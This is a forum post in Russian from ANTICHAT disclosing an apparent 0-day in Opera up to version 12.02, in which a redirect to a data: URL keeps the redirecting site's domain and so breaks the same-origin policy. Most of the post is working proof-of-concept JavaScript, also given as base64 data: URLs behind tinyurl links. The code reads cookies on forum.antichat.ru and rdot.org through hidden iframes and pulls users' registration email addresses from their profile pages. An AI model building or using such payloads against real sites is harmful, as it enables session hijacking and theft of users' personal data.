HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу XSS на любых сайтах (Opera, 0-day, обход SOP)
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 05.10.2012, 18:03
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию
follow

Браузер Opera позволяет выполнить XSS-атаку на любой сайт, который предоставляет возможность размещения ссылок на другие сайты.

Уязвимы версии для Opera для Windows, Mac и Linux до 12.02 включительно (последняя версия на сегодняшний день). На версиях до 9.50 проверка не проводилась.

Советую предварительно ознакомится со следующей информацией:

http://ru.wikipedia.org/wiki/Правило_ограничения_домена

http://ru.wikipedia.org/wiki/Data:_URL

В опере при перенаправлении с сайта на data:URL через HTTP-заголовок Location свойство document.domain имеет значение последнего перенаправляющего сайта.

Пример:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]text[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]base64[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ[/COLOR][COLOR="#007700"]+[/COLOR][/COLOR
Ссылка, сокращенная через сервис tinyurl.com:

http://tinyurl.com/antichat-test1

При переходе по ссылке мы увидим алерт "tinyurl.com".

Если нажать Ctrl+R для повтора запроса, в алерте будет уже другой домен - тот, с которого осуществлен переход на ссылку tinyurl.com/antichat-test1

При нажатии Ctrl+R происходит не обновление текущей страницы, а полное повторение запроса. То же самое действие можно выполнить с помощью JS-метода location.reload()

Пример:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

if([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'tinyurl.com'[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]location[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]reload[/COLOR][COLOR="#007700"]();

else

[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"][/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]text[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]base64[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZWxzZXthbGVydChkb2N1bWVudC5kb21haW4pfTwvc2NyaXB0Pg[/COLOR][COLOR="#007700"]==[/COLOR][/COLOR
Ссылка:

http://tinyurl.com/antichat-test2

Теперь в алерте будет домен, с которого осуществлялся переход. Согласно same origin policy это дает доступ к данным, находящимся на том же домене.

Уязвим сайт, с которого пользователь переходит по ссылке, а не тот сайт, который перенаправлят (не tinyurl.com). "Open redirect" не нужен. Для проведения атаки на сайт достаточно возможности написать на нем ссылку.

Vulnerable the site where user clicks the link, not the one that redirects (not tinyurl.com). "Open redirect" is not needed. To attack the site enough to write on it a link.

PoC:

1) Читаем куки forum.antichat.ru:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

if([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'tinyurl.com'[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]location[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]reload[/COLOR][COLOR="#007700"]();

function[/COLOR][COLOR="#0000BB"]xss[/COLOR][COLOR="#007700"]()

{

[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]frames[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"]);

}

function[/COLOR][COLOR="#0000BB"]ifrAdd[/COLOR][COLOR="#007700"]()

{

 var[/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]createElement[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'iframe'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]style[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'width:0px;height:0px;visibility:hidden'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]+=[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]referrer[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]length[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'s'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]+=[/COLOR][COLOR="#DD0000"]':/css/a.css'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]onload[/COLOR][COLOR="#007700"]= function(){[/COLOR][COLOR="#0000BB"]xss[/COLOR][COLOR="#007700"]()};

[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]body[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]appendChild[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#0000BB"]

[/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]text[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]base64[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe2FsZXJ0KGRvY3VtZW50LmZyYW1lc1swXS5kb2N1bWVudC5jb29raWUpfWZ1bmN0aW9uIGIoKXt2YXIgaT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpZnJhbWUnKTtpLnN0eWxlPSd3aWR0aDowcHg7aGVpZ2h0OjBweDt2aXNpYmlsaXR5OmhpZGRlbic7aS5zcmMgPSAnaHR0cCc7aS5zcmMrPWRvY3VtZW50LnJlZmVycmVyLmxlbmd0aD8nJzoncyc7aS5zcmMrPSc6Ly9mb3J1bS5hbnRpY2hhdC5ydS9jc3MvYS5jc3MnO2kub25sb2FkPWZ1bmN0aW9uKCl7YSgpfTtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGkpfTwvc2NyaXB0Pjxib2R5IG9ubG9hZD1iKCk[/COLOR][COLOR="#007700"]+[/COLOR][/COLOR
Ссылка (пример работает при переходе по ссылке с домена forum.antichat.ru):

http://tinyurl.com/antichat-cookie

2) Читаем куки rdot.org

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

if([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'tinyurl.com'[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]location[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]reload[/COLOR][COLOR="#007700"]();

function[/COLOR][COLOR="#0000BB"]xss[/COLOR][COLOR="#007700"]()

{

[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]frames[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"]);

}

function[/COLOR][COLOR="#0000BB"]ifrAdd[/COLOR][COLOR="#007700"]()

{

 var[/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]createElement[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'iframe'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]style[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'width:0px;height:0px;visibility:hidden'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'https://rdot.org/forum/clientscript/vbulletin_read_marker.js'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]onload[/COLOR][COLOR="#007700"]= function(){[/COLOR][COLOR="#0000BB"]xss[/COLOR][COLOR="#007700"]()};

[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]body[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]appendChild[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]ifr[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#0000BB"]

[/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]text[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]base64[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe2FsZXJ0KGRvY3VtZW50LmZyYW1lc1swXS5kb2N1bWVudC5jb29raWUpfWZ1bmN0aW9uIGIoKXt2YXIgaT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpZnJhbWUnKTtpLnN0eWxlPSd3aWR0aDowcHg7aGVpZ2h0OjBweDt2aXNpYmlsaXR5OmhpZGRlbic7aS5zcmMgPSAnaHR0cHM6Ly9yZG90Lm9yZy9mb3J1bS9jbGllbnRzY3JpcHQvdmJ1bGxldGluX3JlYWRfbWFya2VyLmpzJztpLm9ubG9hZD1mdW5jdGlvbigpe2EoKX07ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpKX08L3NjcmlwdD48Ym9keSBvbmxvYWQ9YigpPg[/COLOR][COLOR="#007700"]==[/COLOR][/COLOR
Ссылка (пример работает при переходе по ссылке с домена rdot.org):

http://tinyurl.com/rdot-cookie

3) Читаем регистрационное мыло forum.antichat.ru

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

if([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'tinyurl.com'[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]location[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]reload[/COLOR][COLOR="#007700"]();

function[/COLOR][COLOR="#0000BB"]getMail[/COLOR][COLOR="#007700"]()

{

 var[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]XMLHttpRequest[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http'[/COLOR][COLOR="#007700"]+ ([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]referrer[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]length[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'s'[/COLOR][COLOR="#007700"]) +[/COLOR][COLOR="#DD0000"]':/profile.php?do=editpassword'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]responseText[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]match[/COLOR][COLOR="#007700"](/[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"email"[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"(.+?)"[/COLOR][COLOR="#007700"]/)[[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]);

}

[/COLOR][COLOR="#0000BB"]

[/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]text[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]base64[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe3ZhciB4PW5ldyBYTUxIdHRwUmVxdWVzdDt4Lm9wZW4oJ0dFVCcsJ2h0dHAnKyhkb2N1bWVudC5yZWZlcnJlci5sZW5ndGggPyAnJyA6ICdzJykrJzovL2ZvcnVtLmFudGljaGF0LnJ1L3Byb2ZpbGUucGhwP2RvPWVkaXRwYXNzd29yZCcsZmFsc2UpO3guc2VuZChudWxsKTthbGVydCh4LnJlc3BvbnNlVGV4dC5tYXRjaCgvbmFtZT0iZW1haWwiIHZhbHVlPSIoLis[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]KSIvKVsxXSl9PC9zY3JpcHQ[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]PGJvZHkgb25sb2FkPWEoKT4[/COLOR][COLOR="#007700"]=[/COLOR][/COLOR
Ссылка (пример работает при переходе по ссылке с домена forum.antichat.ru):

http://tinyurl.com/antichat-mail

4) Читаем регистрационное мыло rdot.org

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

if([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'tinyurl.com'[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]location[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]reload[/COLOR][COLOR="#007700"]();

function[/COLOR][COLOR="#0000BB"]getMail[/COLOR][COLOR="#007700"]()

{

 var[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]XMLHttpRequest[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'https://rdot.org/forum/profile.php?do=editpassword'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]responseText[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]match[/COLOR][COLOR="#007700"](/[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"email"[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"(.+?)"[/COLOR][COLOR="#007700"]/)[[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]);

}

[/COLOR][COLOR="#0000BB"]

[/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]text[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]base64[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe3ZhciB4PW5ldyBYTUxIdHRwUmVxdWVzdDt4Lm9wZW4oJ0dFVCcsJ2h0dHBzOi8vcmRvdC5vcmcvZm9ydW0vcHJvZmlsZS5waHA[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ZG89ZWRpdHBhc3N3b3JkJyxmYWxzZSk7eC5zZW5kKG51bGwpO2FsZXJ0KHgucmVzcG9uc2VUZXh0Lm1hdGNoKC9uYW1lPSJlbWFpbCIgdmFsdWU9IiguKz8pIi8pWzFdKX08L3NjcmlwdD48Ym9keSBvbmxvYWQ9YSgpPg[/COLOR][COLOR="#007700"]==[/COLOR][/COLOR
Ссылка (пример работает при переходе по ссылке с домена rdot.org):

http://tinyurl.com/rdot-mail

тема на rdot.org
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.